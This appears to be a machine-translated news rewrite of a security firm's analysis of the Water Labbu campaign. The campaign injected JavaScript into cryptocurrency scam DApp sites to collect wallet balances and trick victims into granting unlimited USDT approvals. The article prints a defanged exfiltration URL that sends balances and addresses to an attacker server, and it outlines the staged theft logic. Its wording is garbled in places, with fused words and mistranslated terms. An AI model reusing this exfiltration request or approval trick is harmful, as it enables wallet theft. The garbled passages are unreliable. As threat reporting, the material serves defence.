March 29, 2024

How Water Labbu steals cryptocurrencies from scammers

How Water Labbu steals cryptocurrencies from scammers

Water Labbu software benefits from the social engineering schemes of other scammers by introducing maliciousJavaScript code into decentralized applications to steal cryptocurrency.

Researchers at MicroTrend foundWater Labbu malware that attacked services aimed at cryptocurrency fraud. As a rule, crypto scammers use social engineering methods to gain the trust of the victim. In turn, Water Labbu steals cryptocurrencies using a similar method, without using social engineering - at least not directly. Instead, Water Labbu allows other scammers to use their social engineering tricks to trick unsuspecting victims.

When an attacker finds a victim who haswallet connected to one of the fraudulent sites holds a large amount of cryptocurrency, the injected JavaScript payload sends a request for permissions. The request is disguised as if it was sent from a hacked site and asks for permission (permission to use tokens) to transfer an almost unlimited amount of USD Tether (USDT, which is a stablecoin pegged to the US dollar with a value of 1:1) from the wallet goals.

Water Labbu targets are told that the request wasoriginally issued by the DApp, however the permission granted does not belong to the original scammer's crypto addresses, but to another address controlled by Water Labbu.

There are currently 45 known scamscryptocurrency-related DApp sites that were compromised by Water Labbu. These sites have similar styles and themes to sites used in no-loss liquidity scams.

After checking the transaction records of the attackers' addresses on the Ethereum blockchain, it was found that they successfully stole funds from at least nine different victims, totaling at least $316,728.

Analysis of the cryptocurrency theft process

Water Labbu's method involves compromising rogue DApp websites and injecting JavaScript payloads into them.

Experts noticed the following behavior:

  • If the victim downloads the script from an Android or iOS mobile device, he injects the first stage script with the ability to steal cryptocurrency.
  • If the victim downloads the script from the Windows desktop, it injects another script showing a fake Flash update message asking them to download a malicious executable.
  • It is worth noting that the delivery server implementsa mechanism to avoid multiple downloads of a script from the same IP address within a short period of time. If the IP address has accessed the delivery server in the last few hours, or the type of device the victim is using doesn't meet the other prerequisites, it will return a simple script that collects the cookie and LocalStorage data and sends it back to the delivery server.

    Cryptocurrency theft script: first stage

    The web3.js library is loaded initially.This gives the script the ability to connect to the victim's wallet, although the malicious script will only contact the victim's wallet if the victim's wallet is connected to the compromised DApp site. Gaining access to the wallet allows Water Labbu to identify the target's Ethereum address and balance. The script also interacts with the Tether USD smart contract to get the victim's USDT balance. If the wallet contains more than 0.001 ETH or more than 1 USDT, it will send the wallet balance information and wallet address to the collection server, linkstometa[.]com, via an HTTP request.

    The text below displays a request to exfiltrate the wallet balance:

    hxxps[:]//linkstometa[.]com/data/?get&s=[%22{ETH balance}%22,%22{USDT balance}%22]&j={Ethereum address}

    Cryptocurrency theft script: second stage

    The exfiltration request will deploy the scriptthe second stage, as soon as the specified balance has an ETH balance above 0.005 ETH and a USDT token balance above 22,000 USDT. Otherwise, it will return an empty payload and leave victims for other scammers. During the second stage scenario, another balance check is performed and permission to use tokens is requested.

    How Water Labbu steals cryptocurrencies from scammers

    Token Approval Request Asks for Victimsprovide permission to the specified address to complete transactions and spend cryptocurrency assets. The malicious script requests an approval limit of 10^32 USDT, which is far in excess of the total amount of available USDT tokens on the blockchain. When an "approve" request is issued, cryptocurrency wallet applications will ask users to review the details of the request before confirming. If the victim does not carefully verify the request data and grant permission to the Water Labbu address, the attacker will be able to transfer all USDT from the victim's wallet.

    How Water Labbu steals cryptocurrencies from scammers

    Water Labbu managed to steal funds from$316,728 worth of cryptocurrency by injecting their malicious scripts into the fraudulent websites of other fraudsters, demonstrating a willingness to use the methods of other attackers for their own purposes.

    Therefore, users should bewareany investment invitations that come from unreliable parties. In addition, they should not trade cryptocurrencies on any unknown platform without carefully checking its legitimacy, understanding what it does and how it works.